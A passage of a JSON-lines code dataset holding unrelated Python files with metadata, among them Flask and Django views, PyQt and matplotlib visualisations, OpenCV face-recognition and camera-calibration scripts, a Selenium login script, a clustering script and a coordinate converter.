\"\"\"\n\n @classmethod\n def table_name(self):\n raise NotImplementedError()\n\n @classmethod\n def extract_results(cls, net, options, node_name):\n \"\"\"\n Function that extracts certain results.\n\n :param net: The pandapipes network\n :type net: pandapipesNet\n :param options:\n :type options:\n :return: No Output.\n \"\"\"\n output, all_float = cls.get_result_table(net)\n init_results_element(net, cls.table_name(), output, all_float)\n res_table = net[\"res_\" + cls.table_name()]\n return res_table\n\n @classmethod\n def get_component_input(cls):\n \"\"\"\n\n :return:\n :rtype:\n \"\"\"\n raise NotImplementedError\n\n @classmethod\n def get_result_table(cls, net):\n \"\"\"Get result table.\n\n Parameters:\n :param net:\n :type net:\n :return:\n :rtype:\n \"\"\"\n raise NotImplementedError\n","sub_path":"pandapipes/component_models/abstract_models/component_models.py","file_name":"component_models.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"55790436","text":"\nimport matplotlib.pyplot as plt\nfrom ipywidgets import interact, fixed\nimport numpy as np\nplt.style.use('seaborn-whitegrid')\nfrom mpl_toolkits.mplot3d import *\nfrom matplotlib import cm\nfrom scipy.optimize import minimize\n\n\n\n\nplt.style.use('bmh')\nplt.rcParams[\"figure.figsize\"] = [7,7]\nplt.rcParams[\"axes.spines.right\"] 
= False\nplt.rcParams[\"axes.spines.top\"] = False\nplt.rcParams[\"font.size\"] = 18\n\nALPHA = 1/2\n\n# Consumer choice\n\ndef budgetc(c0,p,I):\n '''c1 as a function of c0 along budget line'''\n return I - p*c0\n\ndef u(c, a=ALPHA):\n '''Utility at c=(c[0], c[1])'''\n return (c[0]**a)*(c[1]**(1-a))\n\ndef MU0(c, a=ALPHA):\n '''MU of Cobb-Douglas'''\n return a*u(c,a)/c[0] \n\ndef MU1(c, a=ALPHA):\n return (1-a)*u(c,a)/c[1]\n\ndef indif(c0, ubar, a=ALPHA):\n '''c1 as function of c0, implicitly defined by U(c0, c1) = ubar'''\n return (ubar/(c0**a))**(1/(1-a))\n\ndef cd_demands(p,I,a =ALPHA):\n '''Analytic solution for interior optimum'''\n c0 = a * I/p\n c1 = (1-a)*I\n c = [c0,c1]\n uopt = u(c,a)\n return c, uopt\n\ndef consume_plot(p, I, a=ALPHA):\n cmax = max(I, I/p)*1.1\n c0 = np.linspace(0.1,cmax,num=100)\n ce, uebar = cd_demands(p, I, a)\n fig, ax = plt.subplots(figsize=(9,9))\n ax.plot(c0, budgetc(c0, p, I), lw=2.5)\n ax.fill_between(c0, budgetc(c0, p, I), alpha = 0.2)\n ax.plot(c0, indif(c0, uebar, a), lw=2.5)\n ax.vlines(ce[0],0,ce[1], linestyles=\"dashed\")\n ax.hlines(ce[1],0,ce[0], linestyles=\"dashed\")\n ax.plot(ce[0],ce[1],'ob')\n\n ax.set_xlim(0, cmax)\n ax.set_ylim(0, cmax)\n ax.set_xlabel(r'$c_0$', fontsize=16)\n ax.set_ylabel('$c_1$', fontsize=16)\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n\ndef arb_plot(c0g, I, p):\n cg = [c0g, I - c0g]\n cmax = max(I, I/p)*1.1\n c0 = np.linspace(0.1,cmax,num=100)\n \n '''Display characteristics of a guess along the constraint'''\n fig, ax = plt.subplots(figsize=(9,9))\n ax.plot(c0, budgetc(c0, p, I), lw=1)\n ax.fill_between(c0, budgetc(c0, p, I), alpha = 0.2)\n ax.plot(c0, indif(c0, u(cg)), lw=2.5)\n ax.vlines(cg[0],0,cg[1], linestyles=\"dashed\")\n ax.hlines(cg[1],0,cg[0], linestyles=\"dashed\")\n ax.plot(cg[0],cg[1],'ob')\n mu0pd, mu1pd = MU0(cg), MU1(cg)/p\n if mu0pd > mu1pd:\n inq = r'$>$'\n elif mu0pd < mu1pd:\n inq = r'$<$'\n else:\n inq =r'$=$'\n ax.text(60, 120, r'$\\frac{MU_0}{p_0}$'+inq+r'$\\frac{MU_1}{p_1}$',fontsize=20)\n utext = r'$({:5.1f}, {:5.1f}) \\ \\ U={:5.3f}$'.format(cg[0], cg[1], u(cg))\n ax.text(60, 100, utext, fontsize=12)\n ax.set_xlim(0, cmax)\n ax.set_ylim(0, cmax)\n ax.set_xlabel(r'$c_0$', fontsize=16)\n ax.set_ylabel('$c_1$', fontsize=16)\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n ax.set_title('The No-Arbitrage argument')\n plt.show()\n\n\n#\n\n\n## Ricardian model\n\ndef rppf(mplx, mply, lbar, show = True, title='Home'):\n '''Plot a linear PPF diagram\n show == False delays plt.show() to allow other elements to be plotted first'''\n qy = mply*lbar - (mply/mplx) * QX\n plt.plot(QX, qy, linewidth=2, label='PPF')\n plt.axis([0,XMAX,0,YMAX])\n plt.xlabel(NAMEX), plt.ylabel(NAMEY), plt.title(title)\n plt.text(0.3*XMAX, 0.9*YMAX,\n r' $\\frac{MPL_Y}{MPL_X}=$'+'{:3.2f}'.format(mply/mplx))\n if show: #use False for subplots\n plt.show();\n\n## Linear Demand and Supply\n\n\ndef PD(Q, A, b):\n return np.array(A - b * Q)\n\ndef PS(Q, F, c):\n return np.array(F + c * Q)\n\ndef market(Q, A, b, F, c):\n plt.figure(figsize=(7,7))\n plt.plot(Q,PD(Q, A, b))\n plt.plot(Q, PS(Q, F, c))\n plt.show()\n \n\nif __name__ == '__main__':\n print('Running program tests')\n\n\n","sub_path":"notebooks/intro/cd.py","file_name":"cd.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"58173671","text":"from django.shortcuts import render\nfrom module import 
configtable\nfrom .models import ConfigTable\n\n\ndef create_config_table():\n\n ConfigTable.objects.all().delete()\n\n table = configtable.get_configtable()\n length = len(table['Source'])\n\n for i in range(length):\n ConfigTable.objects.create(source=table['Source'][i],\n configuration=table['Configuration'][i],\n description=table['Description'][i],\n values=table['Values'][i],\n default=table['Default'][i])\n\n\ndef config_table(request):\n\n if ConfigTable.objects.all().count() == 0:\n create_config_table()\n\n ctable = ConfigTable.objects.all()\n return render(request, 'configurations/config_table.html', {'ctable': ctable})\n","sub_path":"configurations/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"205834694","text":"from flask import Blueprint, request\nfrom registhor_app.registrations_routes.queries import queries\nfrom registhor_app.utils import check_api_key, _missing_args, _valid_get\n\n# Instantiate blueprint\nregistrations = Blueprint('registrations', __name__)\n\n\n@registrations.route('/api/v1/registrations/course-codes', methods=['GET'])\n@check_api_key\ndef course_codes():\n\t# Only allow 'en' and 'fr' to be passed to app\n\tlang = 'fr' if request.args.get('lang', None) == 'fr' else 'en'\n\t\n\t# Run query and return as JSON\n\tresults = queries.load_course_codes(lang)\n\tresults_processed = _valid_get(results)\n\treturn results_processed\n\n\n@registrations.route('/api/v1/registrations/department-codes', methods=['GET'])\n@check_api_key\ndef department_codes():\n\t# Only allow 'en' and 'fr' to be passed to app\n\tlang = 'fr' if request.args.get('lang', None) == 'fr' else 'en'\n\t\n\t# Run query and return as JSON\n\tresults = queries.load_department_codes(lang)\n\tresults_processed = _valid_get(results)\n\treturn results_processed\n\n\n@registrations.route('/api/v1/registrations/training-locations', methods=['GET'])\n@check_api_key\ndef training_locations():\n\t# Only allow 'en' and 'fr' to be passed to app\n\tlang = 'fr' if request.args.get('lang', None) == 'fr' else 'en'\n\t\n\t# Unpack arguments\n\tdepartment_code = request.args.get('department_code', '').upper()\n\t\n\tif not department_code:\n\t\treturn _missing_args(missing=['department_code'])\n\t\n\t# Run query and return as JSON\n\tresults = queries.load_training_locations(lang, department_code)\n\tresults_processed = _valid_get(results)\n\treturn results_processed\n","sub_path":"registhor_app/registrations_routes/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"433928768","text":"#!/usr/bin/env python\n\"\"\"\n\"\"\"\n\nimport sys\n\nimport numpy\nfrom PyQt5 import (QtGui, QtCore, QtWidgets)\n\nimport stompy\n\n\nignore_event_types = [77, 12, 2, 3, 5]\n\n\nclass Leg(object):\n def __init__(self, number=0):\n # joint angles\n self.hip = 0.\n self.thigh = 0.\n self.knee = 0.\n self.number = number\n\n def points(self):\n \"\"\"Generate xyz points for links from angles\"\"\"\n return numpy.array(list(\n stompy.kinematics.leg.angles_to_points(\n self.hip, self.thigh, self.knee)))\n\n def _advance(self):\n \"\"\"Fake leg movement\"\"\"\n if not hasattr(self, '_delta'):\n self._delta = ('hip', 0.05)\n if not hasattr(self, '_limits'):\n self._limits = stompy.geometry.get_limits(self.number)\n jn, da = self._delta\n jv = getattr(self, jn)\n nv = jv + da\n 
limits = self._limits[jn]\n if limits[0] <= nv <= limits[1]:\n setattr(self, jn, nv)\n return\n # no longer in limits\n if da > 0:\n jn = {'hip': 'thigh', 'thigh': 'knee', 'knee': 'hip'}[jn]\n da *= -1\n self._delta = (jn, da)\n return self._advance()\n\n\nclass OrthoProjection(object):\n # TODO clip elevation and azimuth\n # TODO sanitize scalar\n def __init__(self, elevation=0., azimuth=0., scalar=1., offset=None):\n # TODO use properties to cause update/repaint\n self.elevation = elevation\n self.azimuth = azimuth\n self.scalar = scalar\n if offset is None:\n offset = (0, 0)\n self.offset = offset\n\n def to_transform(self):\n # rotate points by elevation and azimuth\n # apply yaw first\n yT = stompy.transforms.rotation_3d(0., 0., self.azimuth)\n eT = stompy.transforms.rotation_3d(self.elevation, 0., 0.)\n #return yT * eT\n return eT * yT\n\n def project_points(self, pts):\n \"\"\"Project a set of xyz points to xy\"\"\"\n # TODO cache?\n T = self.to_transform()\n tpts = stompy.transforms.transform_3d_array(T, pts)\n #print(tpts)\n # then apply scaling and throw out z\n spts = tpts[:, :2] * self.scalar\n # apply offset\n #print(spts)\n opts = spts + numpy.array(self.offset)[numpy.newaxis, :]\n #print(opts)\n return opts\n\n\nclass LegDisplay(QtWidgets.QWidget):\n def __init__(self):\n super(LegDisplay, self).__init__()\n #self.setAttribute(QtCore.Qt.WA_AcceptTouchEvents)\n for g in (\n QtCore.Qt.PanGesture, QtCore.Qt.SwipeGesture,\n QtCore.Qt.PinchGesture):\n self.grabGesture(g)\n self.projection = OrthoProjection()\n self.leg = Leg()\n self._pens = {\n 'links': [\n QtGui.QPen(QtCore.Qt.red, 2), # hip link\n QtGui.QPen(QtCore.Qt.green, 2), # thigh link\n QtGui.QPen(QtCore.Qt.blue, 2), # calf link\n ],\n 'axes': [\n QtGui.QPen(QtCore.Qt.red, 1, QtCore.Qt.DotLine),\n QtGui.QPen(QtCore.Qt.green, 1, QtCore.Qt.DotLine),\n QtGui.QPen(QtCore.Qt.blue, 1, QtCore.Qt.DotLine),\n ],\n 'limits': QtGui.QPen(QtCore.Qt.magenta, 1, QtCore.Qt.DashLine),\n }\n\n def resizeEvent(self, event):\n # account for any user applied offset\n os = event.oldSize()\n ow, oh = os.width(), os.height()\n ohw, ohh = ow / 2, oh / 2\n dx = self.projection.offset[0] - ohw\n dy = self.projection.offset[1] - ohh\n # event.oldSize()\n self.projection.offset = (\n self.width() / 2 + dx,\n self.height() / 2 + dy)\n\n def paintEvent(self, event):\n #print(\n # \"Azimuth: %s, Elevation: %s\" %\n # (self.projection.azimuth, self.projection.elevation))\n #self.projection.offset = (self.width() / 2, self.height() / 2)\n\n painter = QtGui.QPainter()\n painter.begin(self)\n\n # apply transform to center 0,0\n #T = painter.worldTransform()\n #T.translate(self.width() / 2, self.height() / 2)\n #painter.setWorldTransform(T, combine=False)\n\n painter.setRenderHints(QtGui.QPainter.Antialiasing)\n\n # draw axes\n sx, sy = self.projection.offset\n #sx, sy = 0, 0\n for (i, pen) in enumerate(self._pens['axes']):\n pt = [0., 0., 0.]\n pt[i] = 12.\n x, y = self.projection.project_points([pt])[0]\n painter.setPen(pen)\n painter.drawLine(sx, sy, x, y)\n\n # draw leg\n pts = self.leg.points()\n links = self.projection.project_points(pts)\n sx, sy = self.projection.offset\n #sx, sy = 0, 0\n for (pen, link) in zip(self._pens['links'], links):\n painter.setPen(pen)\n x, y = link\n painter.drawLine(sx, sy, x, y)\n sx, sy = x, y\n\n # draw limits\n z = pts[-1][2]\n lpts = stompy.kinematics.leg.limits_at_z_3d(\n z, self.leg.number)\n if lpts is not None:\n tpts = self.projection.project_points(lpts)\n pen = self._pens['limits']\n 
painter.setPen(self._pens['limits'])\n painter.drawPolyline(\n QtGui.QPolygonF([QtCore.QPointF(*pt) for pt in tpts]))\n\n # TODO draw foot\n\n # TODO draw load\n\n painter.end()\n\n def event(self, event):\n if event.type() not in ignore_event_types:\n print(event.type(), type(event))\n if isinstance(event, QtWidgets.QGestureEvent):\n return self.gestureEvent(event)\n return super(LegDisplay, self).event(event)\n\n def gestureEvent(self, event):\n r = True\n for g in event.gestures():\n if isinstance(g, QtWidgets.QPinchGesture):\n print('PINCH', g.scaleFactor())\n self.projection.scalar *= g.scaleFactor()\n self.update()\n r = False\n else:\n print(g)\n return r\n\n def mousePressEvent(self, event):\n #print('mouse press', event)\n if event.button() == QtCore.Qt.RightButton:\n # TODO bring out reset positions\n self.projection.azimuth = 0\n self.projection.elevation = numpy.pi / 2.\n self.update()\n if event.button() == QtCore.Qt.MiddleButton:\n pt = event.pos()\n self._middle_click_pos = pt.x(), pt.y()\n if event.button() == QtCore.Qt.LeftButton:\n # right mouse clicked\n pt = event.pos()\n self._right_click_pos = pt.x(), pt.y()\n\n def mouseMoveEvent(self, event):\n #print('mouse move', event)\n if hasattr(self, '_right_click_pos'):\n # drag\n x0, y0 = self._right_click_pos\n pt = event.pos()\n x1, y1 = pt.x(), pt.y()\n dx = x1 - x0\n dy = y1 - y0\n update = False\n # TODO bring out rotation scaling factors\n if (dx != 0): # change azimuth\n self.projection.azimuth -= dx * 0.01\n update = True\n if (dy != 0): # change elevation\n self.projection.elevation -= dy * 0.01\n update = True\n if update:\n self.update()\n self._right_click_pos = (x1, y1)\n if hasattr(self, '_middle_click_pos'):\n # drag\n x0, y0 = self._middle_click_pos\n pt = event.pos()\n x1, y1 = pt.x(), pt.y()\n dx = x1 - x0\n dy = y1 - y0\n self.projection.offset = (\n self.projection.offset[0] + dx,\n self.projection.offset[1] + dy)\n self.update()\n self._middle_click_pos = (x1, y1)\n\n def mouseReleaseEvent(self, event):\n #print('mouse release', event)\n if hasattr(self, '_right_click_pos'):\n del self._right_click_pos\n if hasattr(self, '_middle_click_pos'):\n del self._middle_click_pos\n\n def wheelEvent(self, event):\n #print('wheel', event)\n d = event.delta()\n print(d)\n nd = max(-1., min(1., d / 1000.)) + 1.\n self.projection.scalar *= nd\n self.update()\n\n\ndef main():\n app = QtWidgets.QApplication(sys.argv)\n #w = QtGui.QWidget()\n w = LegDisplay()\n w.resize(300, 300)\n w.move(300, 300)\n w.setWindowTitle('Simple')\n w.show()\n w.projection.scalar = 3.\n w.projection.elevation = numpy.pi / 4.\n\n def tick():\n #w.projection.azimuth += numpy.pi / 50.\n #w.projection.elevation += numpy.pi / 50.\n\n # fake move leg\n w.leg._advance()\n\n w.update()\n\n timer = QtCore.QTimer()\n timer.timeout.connect(tick)\n timer.start(33)\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tests/nogl_leg_pyqt5.py","file_name":"nogl_leg_pyqt5.py","file_ext":"py","file_size_in_byte":8869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"29937001","text":"# -*- coding: utf-8 -*-\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy import stats\nimport pandas as pd\nimport numpy as np\nimport json\nfrom sklearn.cluster import KMeans\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\n\nwith open('usuarios.txt', 'r') as file:\n usuarios = json.load(file)\n\n# formatting the data for use in the K-means algorithm\ndata = []\n\ncolumns = [\"username\",\"reputation\",\"user_mentions\", \"retweets\", \"urls\", \"statuses_count\"]\n\nfor usuario in usuarios:\n user_array = []\n\n # not using the username as a parameter\n # user_array.append(usuario)\n user_array.append(usuarios[usuario][\"reputation\"])\n user_array.append(usuarios[usuario][\"user_mentions\"])\n user_array.append(usuarios[usuario][\"retweets\"])\n user_array.append(usuarios[usuario][\"urls\"])\n user_array.append(usuarios[usuario][\"statuses_count\"])\n \n data.append(user_array)\n\n# Data standardization\nX_std = StandardScaler().fit_transform(data)\n\n# initializing PCA to produce the 2 principal components\npca = PCA(n_components=2)\nprincipalComponents = pca.fit_transform(X_std)\n\nPCA_components = pd.DataFrame(principalComponents, columns=['pca1','pca2'])\n\nkmeans = KMeans(n_clusters=2,random_state=0).fit(PCA_components)\nlabels = kmeans.labels_\n\n# the cluster names are the labels generated by kmeans\nPCA_components['cluster'] = labels\nPCA_components['usuario']= usuarios\n\n# saving results as json to an external file for reviewing the profiles\nPCA_components.to_json(r'~/Documentos/hidrenix/classificacao.txt', orient='records')\n\n# plot the chart in 2 dimensions\nsns.lmplot('pca1', 'pca2',\n data=PCA_components,\n fit_reg=False,\n hue=\"cluster\",\n scatter_kws={\"marker\":\"D\", \"s\": 100})\n\nplt.title(\"Clusters PCA\")\nplt.xlabel('PCA_1')\nplt.ylabel('PCA_2')\n\nplt.show()","sub_path":"clusterization.py","file_name":"clusterization.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"5360794","text":"METRIC_FORMATS = {\n 'CHAR': 'c',\n 'COMPLEX': 'dd',\n 'DOUBLE': 'd',\n 'FLOAT': 'd',\n 'HISTOGRAM': 'P',\n 'INT': 'i',\n 'INT16': 'h',\n 'INT32': 'i',\n 'INT64': 'q',\n 'INT8': 'b',\n 'INTEGER': 'q',\n 'MAXDOUBLE': 'd',\n 'MINDOUBLE': 'd',\n 'NDOUBLES': 'P',\n 'RATE': 'P',\n 'SCALE_FUNC': 'P',\n 'SHORT INT': 'h',\n 'SIGNED INT': 'i',\n 'SIGNED INTEGER': 'q',\n 'SIGNED SHORT INT': 'h',\n 'TAU_ATOMIC': 'P',\n 'UINT16': 'H',\n 'UINT32': 'I',\n 'UINT64': 'Q',\n 'UINT8': 'c',\n 'UNSIGNED INT': 'I',\n 'UNSIGNED INTEGER': 'Q',\n 'UNSIGNED SHORT INT': 'H',\n}\n","sub_path":"pycubexr/utils/metric_formats.py","file_name":"metric_formats.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"35795358","text":"import os \nfrom selenium import webdriver \nfrom selenium.webdriver.chrome.options import Options \nfrom selenium.webdriver.common.keys import Keys\n\nCHROMEDRIVER_PATH = \"C:/tools/selenium/chromedriver.exe\"\nchrome_options = Options() \nchrome_options.add_argument(\"--headless\") \nchrome_options.add_argument('--disable-gpu')\ndriver = webdriver.Chrome(CHROMEDRIVER_PATH, chrome_options=chrome_options)\n \nuser = \"\"\npwd = \"\"\ndriver.get(\"http://www.facebook.com\")\nassert \"Facebook\" in driver.title\nelem = driver.find_element_by_id(\"email\")\nelem.send_keys(user)\nelem = driver.find_element_by_id(\"pass\")\nelem.send_keys(pwd)\nelem.send_keys(Keys.RETURN)\ndriver.save_screenshot('example1-chrome-headless-screen1.png')\ndriver.close()\n","sub_path":"roles/seleniumpythonexamples_win/files/example1-chrome-headless.py","file_name":"example1-chrome-headless.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} 
+{"seq_id":"523359549","text":"from __future__ import unicode_literals\n\nimport os\n\nfrom setuptools import setup\n\n\nVERSION = '0.0.1dev1'\n\n\ndef write_version_py(filename=None):\n if filename is None:\n filename = os.path.join(os.path.dirname(__file__),\n 'stackimport', 'version.py')\n ver = \"\"\"\\\nversion = '{version}'\n\"\"\"\n fh = open(filename, 'wb')\n try:\n fh.write(ver.format(version=VERSION).encode('utf-8'))\n finally:\n fh.close()\n\n\nwrite_version_py()\n\n\nsetup(\n name='stackimport',\n version=VERSION,\n url='https://github.com/enthought/pydata-ldn-2014',\n author='Simon Jagoe',\n author_email='simon@simonjagoe.com',\n classifiers=[\n 'Development Status :: 1 - Planning',\n 'Operating System :: POSIX',\n 'Operating System :: Unix',\n 'Programming Language :: Python',\n ],\n description='Postgresql importer for stackexchange data',\n packages=['stackimport'],\n)\n","sub_path":"stackexchange/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"562134842","text":"pkgname = \"sushi\"\npkgver = \"44.2\"\npkgrel = 0\nbuild_style = \"meson\"\nhostmakedepends = [\n \"meson\",\n \"pkgconf\",\n \"glib-devel\",\n \"gobject-introspection\",\n \"gettext\",\n \"gjs\",\n]\nmakedepends = [\n \"glib-devel\",\n \"libepoxy-devel\",\n \"freetype-devel\",\n \"evince-devel\",\n \"gdk-pixbuf-devel\",\n \"gstreamer-devel\",\n \"gst-plugins-base-devel\",\n \"gtk+3-devel\",\n \"gtksourceview4-devel\",\n \"harfbuzz-devel\",\n \"webkitgtk-devel\",\n]\ndepends = [\"evince\", \"nautilus\"]\npkgdesc = \"File previewer for GNOME\"\nmaintainer = \"q66 \"\nlicense = \"GPL-2.0-or-later\"\nurl = \"https://gitlab.gnome.org/GNOME/sushi\"\nsource = f\"$(GNOME_SITE)/{pkgname}/{pkgver[:-2]}/{pkgname}-{pkgver}.tar.xz\"\nsha256 = \"6c002fe0aea19027ba448b5aec94d5cd753c9752f996ee033152428738ea43e9\"\n","sub_path":"main/sushi/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"215301191","text":"import cv2\nimport pyk4a\nfrom helpers import colorize\nfrom pyk4a import Config, PyK4A\nimport numpy as np\n\ncriteria = (cv.TERM_CRITERIA_EPS + cv.TERM_CRITERIA_MAX_ITER, 30, 0.001)\n# prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)\nobjp = np.zeros((3*3,3), np.float32)\nobjp[:,:2] = np.mgrid[0:3,0:3].T.reshape(-1,2)\n# Arrays to store object points and image points from all the images.\nobjpoints = [] # 3d point in real world space\nimgpoints = [] # 2d points in image plane.\n\ndef main():\n k4a = PyK4A(\n Config(\n color_resolution=pyk4a.ColorResolution.RES_720P,\n depth_mode=pyk4a.DepthMode.NFOV_UNBINNED,\n )\n )\n k4a.start()\n\n exp_dict = {-11: 500, -10: 1250, -9: 2500, -8: 8330, -7: 16670, -6: 33330}\n exp_val = -7 # to be changed when running\n k4a.exposure = exp_dict[exp_val]\n\n id = 0\n\n while True:\n capture = k4a.get_capture()\n\n if capture.color is not None:\n color = capture.color\n cv2.imshow(\"Color\", color)\n\n if capture.transformed_depth is not None:\n depth_transformed = capture.transformed_depth\n cv2.imshow(\n \"Transformed Depth\", colorize(depth_transformed, (600, 1100))\n )\n\n gray = cv.cvtColor(color, cv.COLOR_BGR2GRAY)\n # Find the chess board corners\n ret, corners = cv.findChessboardCorners(gray, (3,3), None)\n # If found, add object points, image points (after refining them)\n if ret == True:\n 
objpoints.append(objp)\n corners2 = cv.cornerSubPix(gray,corners, (3,3), (-1,-1), criteria)\n imgpoints.append(corners)\n # Draw and display the corners\n cv.drawChessboardCorners(img, (3,3), corners2, ret)\n cv.imshow('img', img)\n cv.waitKey(1)\n\n key = cv2.waitKey(1)\n if key == ord('s'):\n cv2.imwrite(f\"data/intrinsic_test/color_{id}.png\", color)\n id += 1\n elif key == ord('q'):\n cv2.destroyAllWindows()\n break\n\n k4a.stop()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"realtime_5x5.py","file_name":"realtime_5x5.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"226838812","text":"\"\"\" \nConverts coordinates from GPS coorodinates (latitude/longitude - epsg:4326) from geojson file to any chosen epsg projection \nand saving these new coordinates to the new geojson file (new_file)\n\"\"\"\n\nimport pyproj\nimport geojson\nimport json\n\ndef coor_converter(file, new_file, epsg):\n # Transformation from GPS coordinates to desired epsg projection\n transformer = pyproj.Transformer.from_crs(\"epsg:4326\",\"epsg:\"+str(epsg))\n \n # Open geojson file with GPS coordinates\n with open(file) as f:\n gj = geojson.load(f)\n \n # Load coordinates from geojson file\n cdnts = gj['features'][0]['geometry']['coordinates']\n \n # Transformation of coordinates\n k = 0\n n = len(cdnts)\n m = len(cdnts[0])\n trans_coord = [[0]*m for i in range(n)]\n for i in range(len(cdnts)):\n for j in range(len(cdnts[0])):\n [x1, y1] = cdnts[i][j]\n trans_coord[0][k] = transformer.transform(y1, x1)\n k += 1\n \n with open(file, 'r') as f:\n data = json.load(f)\n\n data['features'][0]['geometry']['coordinates'] = trans_coord\n \n with open(new_file, 'w+') as f:\n json.dump(data, f)\n \n print(\"The file {} has been saved!\".format(new_file))\n ","sub_path":"coordinates_converter.py","file_name":"coordinates_converter.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"261241015","text":"import cv2\nimport os\nimport numpy as np\nimport cv2.cuda\nimport time\nimport csv\n\nCSV_MODE = 'w'\n\ncapture = cv2.VideoCapture(0)\nrecognizer = cv2.face.LBPHFaceRecognizer_create()\nrecognizer.read('face-trainner_nohair_nosize.yml')\n\ndef tryFaces(frame, ang, scale, file_name):\n framCpy = np.copy(frame)\n face_cascade = cv2.CascadeClassifier('cascades/haarcascade_frontalface_alt2.xml')\n frame_gray = cv2.cvtColor(framCpy, cv2.COLOR_BGR2GRAY)\n # frame_gray = cv2.equalizeHist(frame_gray)\n\n # -- Detect faces\n faces = face_cascade.detectMultiScale(frame_gray, scaleFactor=scale)\n best_dist = 1000\n best_match = (-1,0,0,0)\n count = 0\n for (x, y, w, h) in faces:\n center = (x + w // 2, y + h // 2)\n framCpy = cv2.ellipse(framCpy, center, (w // 2, h // 2), 0, 0, 360, (255, 0, 255), 2)\n roi = frame_gray[y:y + h, x:x + w]\n _id, clvl = recognizer.predict(roi)\n if clvl > 0:\n count += 1\n if clvl1:\n\n best_dist = clvl\n best_match = (x,y,w,h)\n #if clvl < 100:\n cv2.putText(framCpy, f\"{clvl:.2f}\", (x, y+10), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2,\n cv2.LINE_AA)\n #-- In each face, detect eyes\n #cv2.imshow(\"testroi\", roi)\n\n writer.writerow([file_name, ang, len(faces), count])\n\n if not best_match == (-1,0,0,0):\n x, y, w, h = best_match\n framCpy = cv2.rectangle(framCpy, (x,y), (x+w,y+h), (255,255,0), thickness=10)\n cv2.putText(framCpy, \"Jon\", (x, y + 30), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2,\n 
cv2.LINE_AA)\n\n\n if(framCpy.shape[0] > 1000 or framCpy.shape[1] > 1000):\n scale_percent = 30 # percent of original size\n width = int(framCpy.shape[1] * scale_percent / 100)\n height = int(framCpy.shape[0] * scale_percent / 100)\n dim = (width, height)\n framCpy = cv2.resize(framCpy, dim, interpolation=cv2.INTER_AREA)\n\n return framCpy\n\ndef rotate_image(image, angle):\n image_center = tuple(np.array(image.shape[1::-1]) / 2)\n rot_mat = cv2.getRotationMatrix2D(image_center, angle, 1.0)\n result = cv2.warpAffine(image, rot_mat, image.shape[1::-1], flags=cv2.INTER_LINEAR)\n return result\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nchallenge_dir = os.path.join(BASE_DIR, \"challenges\\Dataset\")\nEVAL_DIR = os.path.join(BASE_DIR, '..', 'Eval')\nDATA_DIR = os.path.join(EVAL_DIR, 'rotation')\n\nsave_file = open(os.path.join(EVAL_DIR, \"rotation_LBPH.csv\"), CSV_MODE, newline='')\nwriter = csv.writer(save_file)\n\noutput_dir = os.path.join(EVAL_DIR, \"rotation LBPH\")\n\n\nif CSV_MODE == 'w':\n writer.writerow([\"file\", \"angle\", \"detections\", \"matches\"])\n\n\nif not os.path.isdir(output_dir):\n os.mkdir(output_dir)\n\nfor root, dirs, files in os.walk(DATA_DIR):\n if \"unused\" in root:\n continue\n for file in files:\n file = file.lower()\n if file.endswith(\"png\") or file.endswith(\"jpg\") or file.endswith(\"jpeg\"):\n file_name = os.path.splitext(file)[0]\n data_output_dir = os.path.join(output_dir, file_name)\n if not os.path.isdir(data_output_dir):\n os.mkdir(data_output_dir)\n img = cv2.imread(os.path.join(root, file))\n for i in range(-91, 91):\n cv2.imwrite(os.path.join(data_output_dir, str(i) + \".jpg\"), tryFaces(rotate_image(img, i), i, 1.09, file_name))\n\ncv2.waitKey()\ncv2.destroyAllWindows()\n","sub_path":"Task 1/rotationGetData_LBPH.py","file_name":"rotationGetData_LBPH.py","file_ext":"py","file_size_in_byte":3476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"437315560","text":"'''\nProblem Description\nWrite a function that checks whether two strings are anagrams of each other. A string s1 is an anagram of another string s2 if the same characters exist in both s1 and s2 in any order. For example: \"abcd\" and \"cdab\" are anagrams. 
